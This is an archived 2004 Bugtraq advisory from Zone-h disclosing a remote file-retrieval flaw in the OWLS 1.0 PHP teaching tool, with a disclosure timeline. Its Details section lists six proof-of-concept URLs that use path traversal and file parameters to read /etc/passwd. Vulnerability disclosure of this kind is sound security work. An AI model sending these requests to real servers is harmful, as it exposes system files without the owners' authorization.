Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos network security services platform







Bugtraq: ZH2004-08SA (security advisory): OWLS 1.0 Remote arbitrary files retrieving

ZH2004-08SA (security advisory): OWLS 1.0 Remote arbitrary files retrieving

From: ZetaLabs <zetalabs_at_zone-h.org>
Date: 18 Feb 2004 09:14:59 -0000
('binary' encoding is not supported, stored as-is) ZH2004-08SA (security advisory): OWLS 1.0 Remote arbitrary files retrieving

Discovered: 05 january 2004

Vendor contacted: 07 january 2004

Published: 18 february 2004

Name: OWLS

Affected Systems: 1.0

Issue: Remote file retrieving

Author: G00db0y from Zone-h Security Labs - g00db0y_at_zone-h.org - zetalabs_at_zone-h.org

Vendor: http://www.foolsworkshop.com/owls/



Description

***********

Zone-h Security Team has discovered a flaw in OWLS 1.0. There is a vulnerability in the current version of OWLS that allows an attacker to retrieve arbitrary files from the webserver with its priviledges.
"OWLS is a web-based environment for instructors of language to easily create exercises, readings, glossaries, and present media for their students. Once installed on a web server that supports PHP,
instructors can create materials or upload media for presentation to their students through a simple form based interface"


Details

*******


It's possibile for a remote attacker to retrieve any file from a webserver. Multiple files are affected with this problem.

For example try this:

http://address/owls/glossaries/index.php?file=/etc/passwd

http://address/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print

http://address/owls/readings/index.php?filename=/etc/passwd

http://address/owls/multiplechoice/resultsignore.php?filename=/etc/passwd

http://address/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd

http://address/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd



Solution:

*********

The vendor has been contacted and a patch was not yet produced.





G00db0y from Zone-h Security Labs - g00db0y_at_zone-h.org - zetalabs_at_zone-h.org
 


http://www.zone-h.org/en/advisories/read/id=3973/
Received on Feb 18 2004
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]